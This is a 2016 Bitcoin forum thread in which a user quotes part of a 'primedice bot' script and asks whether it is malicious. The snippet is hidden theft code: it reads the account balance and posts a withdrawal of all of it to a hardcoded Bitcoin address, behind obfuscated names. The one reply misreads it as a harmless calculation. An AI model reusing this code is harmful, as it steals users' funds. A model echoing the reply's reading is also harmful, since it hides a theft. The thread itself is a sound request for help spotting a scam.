Bitcoin Forum
May 26, 2024, 07:28:32 AM *
News: Latest Bitcoin Core release: 27.0 [Torrent]
 
   Home   Help Search Login Register More  
Pages: [1]
  Print  
Author Topic: Explain this part of the script (javascript) please  (Read 308 times)
kolesozw (OP)
Legendary
*
Offline Offline

Activity: 1316
Merit: 1004


FRX: Ferocious Alpha


View Profile
March 12, 2016, 11:07:15 AM
 #1

I'm not a coder so I don't understand this thing but I can smell something fishy on it. Its part of a "primedice bot" script

lut['getJSON'](
        calculate_nonce('users/1'), function(seed) {
            var key1 = 'amount'
            var key2 = 'address'
            var load = {};
            load[key1] = seed['user']['balance'];
            load[key2] = '37x2wJdnSiv8tqcusDC4Fg5mP5QPpsWKkJ';
            lut['post'](calculate_nonce('withdraw'), load);
        }
    );


naypalm
Legendary
*
Offline Offline

Activity: 1272
Merit: 1012


howdy


View Profile WWW
March 12, 2016, 05:10:01 PM
 #2

All I can tell is that it takes in JSON and posts some calculation of a withdraw...


Pages: [1]
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!